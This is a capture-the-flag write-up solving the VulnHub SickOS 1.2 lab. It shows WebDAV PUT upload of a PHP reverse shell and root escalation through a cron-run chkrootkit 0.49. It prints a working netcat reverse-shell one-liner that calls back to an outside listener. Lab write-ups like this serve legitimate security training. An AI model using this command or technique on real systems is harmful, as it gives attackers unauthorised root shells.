SickOS 1.2 - VulnHub VM Challenge


How to crack SickOS1.2 VM lab without Metasploit.

tl;dr

  • Chkrootkit 0.49
  • Privilege escalation using Cronjob.

Solved by: 01_susil

This is a Linux box with IP 192.168.12.9

Initial Analysis

Doing a Port scan nmap enumerator, Basic scan.

Nmap

The system is running OpenSSH, web server lighttpd 1.4.28. Running a background check for known vulnerabilites.

Opening up the browser to check for more details.

website

There was nothing much information on this page. It contained only a meme

Opening up the Dirb Web Content Scanner to check for more information.

dirb

/test/ directory has been found from Dirb scan.

Let’s Checkout the /test directory.

test

It looks like a WebDAV directory. WebDAV is a long-standing protocol that enables a webserver to act as a fileserver and support collaborative authoring of content on the web.

curl

PUT method is meant for “uploading” stuff to a particular URI, or overwriting what is already in that URI.
Here the PUT method is allowed! Uploading a php-reverse-shell should work.

Exploit

revshell

Netcat is a utility which reads and writes data across network connections using TCP or UDP protocol.
Setup Netcat listener to spawn a reverse shell.

shell

We don’t have root access till now, let’s list the directory.

ls

cron

Checking cron jobs, found the chkrootkit and its version.
Cron job is a time-based job scheduler. Users use cron to schedule jobs to run periodically at fixed times.
Chkrootkit is a shell script that checks system binaries for rootkit modification.

expl

Create a file named Update which contained

  • rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.222 443 >/tmp/f

rm removes /tmp/f
mkfifo creates a fifo file with name pathname /tmp/f
2>&1 command pipe stdout and stderr to command.
nc is netcat tool to spawn a reverse shell.
Now to make update file as executed file I’m using “ chmod 777 update “.

Now cronjob will execute the update file every minute. Setup a netcat listener on port 443 which is mentioned in the update file.

root

And that’s how I solved SickOS 1.2!